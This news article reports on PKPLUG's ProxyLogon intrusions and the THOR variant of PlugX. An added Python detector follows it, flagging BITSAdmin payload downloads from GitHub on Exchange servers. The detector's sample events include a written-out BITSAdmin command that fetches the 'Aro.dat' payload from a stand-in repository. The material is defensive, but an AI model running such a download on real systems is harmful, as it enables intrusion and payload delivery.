Hackers from China implanted PlugX Variant on MS Exchange Servers


29th July 2021, Kathmandu

Hackers from China implanted a PlugX variant on Microsoft Exchange servers after compromising them. A Chinese cyberespionage group targeting Southeast Asia took advantage of a Microsoft Exchange Server vulnerability disclosed in early March to deploy a previously undocumented variant of a remote access Trojan (RAT) on the compromised systems.

Palo Alto Networks' Unit 42 threat intelligence team attributed the intrusion to the threat actor tracked as PKPLUG (also known as Mustang Panda and HoneyMyte), stating that it had discovered a new version of the modular PlugX malware, called Thor, delivered as a post-exploitation tool on one of the compromised servers.

Dating back to 2008, PlugX is a full-featured second-stage implant with capabilities such as file upload, download and modification, keystroke logging, webcam control, and access to remote command shells.

“The uniqueness of the observed variant […] is that it contains changes to its core source code: its trademark word ‘PLUG’ is replaced with ‘THOR’,” pointed out Unit 42 researchers Mike Harbison and Alex in a white paper published on Tuesday. The earliest THOR sample found dates from August 2019 and is the first known instance of the renamed code. New features have also been observed in this variant.

After Microsoft disclosed on March 2 that Chinese hackers codenamed Hafnium were exploiting zero-day flaws in Exchange Server, collectively known as ProxyLogon, to steal sensitive data from selected targets, multiple threat actors, including ransomware groups (DearCry and Black Kingdom) and crypto-mining gangs (LemonDuck), used the same flaws to hijack Exchange servers and install web shells that allow code execution at the highest privilege level. According to Unit 42,

PKPLUG is now added to that list. The researchers found that, after compromising the Microsoft Exchange server, the attacker used legitimate executables such as BITSAdmin to retrieve a seemingly harmless file (“Aro.dat”) from an actor-controlled GitHub repository, bypassing anti-virus detection. The file contains the encrypted and compressed PlugX payload; its name refers to a free utility, the Advanced Repair and Optimization tool, designed to clean up and repair problems in the Windows registry.
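As an added illustration (not code from the Unit 42 report or this article), the following Python detector flags the living-off-the-land download step described above: a BITSAdmin transfer that fetches a file from GitHub-hosted content, especially when spawned from the IIS worker process on an Exchange server. The pipe-delimited event layout, host names, paths and URLs are constructed for this example and are not a real log format or real indicators.

```python
import re
# Constructed sample process-creation events (simplified Sysmon-style fields;
# this pipe-delimited layout is an assumption for the example, not a real format).
SAMPLE_EVENTS = [
    "2021-03-05 10:12:01|host=exch01|parent=w3wp.exe|image=C:\\Windows\\System32\\bitsadmin.exe"
    "|cmdline=bitsadmin /transfer job /download /priority high "
    "https://raw.githubusercontent.com/example/repo/main/Aro.dat C:\\ProgramData\\Aro.dat",
    "2021-03-05 10:15:44|host=exch01|parent=explorer.exe|image=C:\\Windows\\System32\\bitsadmin.exe"
    "|cmdline=bitsadmin /list",
    "2021-03-05 10:20:09|host=ws07|parent=cmd.exe|image=C:\\Windows\\System32\\bitsadmin.exe"
    "|cmdline=bitsadmin /transfer upd https://updates.example.com/patch.msi C:\\Temp\\patch.msi",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Hosts serving GitHub-hosted content, the source the report names for the Aro.dat download.
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
# IIS worker process: BITSAdmin spawned from it on an Exchange server points to a web shell.
WEB_SERVER_PARENTS = {"w3wp.exe"}

def parse_event(line):
    """Split a pipe-delimited event into a dict; the first field is the timestamp."""
    parts = line.split("|")
    fields = {"timestamp": parts[0]}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def analyze_event(line):
    """Return an alert dict for a suspicious BITSAdmin transfer, or None for benign use."""
    ev = parse_event(line)
    cmd = ev.get("cmdline", "")
    if not ev.get("image", "").lower().endswith("bitsadmin.exe") or "/transfer" not in cmd.lower():
        return None
    urls = URL_RE.findall(cmd)
    if not urls:
        return None
    reasons = []
    if urls[0].split("/")[2].lower() in GITHUB_HOSTS:
        reasons.append("BITSAdmin download from GitHub-hosted content")
    if ev.get("parent", "").lower() in WEB_SERVER_PARENTS:
        reasons.append("launched by IIS worker process (possible web shell)")
    if not reasons:
        return None
    return {"timestamp": ev["timestamp"], "host": ev.get("host", ""), "parent": ev.get("parent", ""),
            "url": urls[0], "dest": cmd.split()[-1], "reasons": reasons}

def scan(lines):
    return [a for a in map(analyze_event, lines) if a is not None]
```

Only the first constructed event trips both conditions; the plain `bitsadmin /list` and the vendor-update transfer spawned by `cmd.exe` are left alone.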

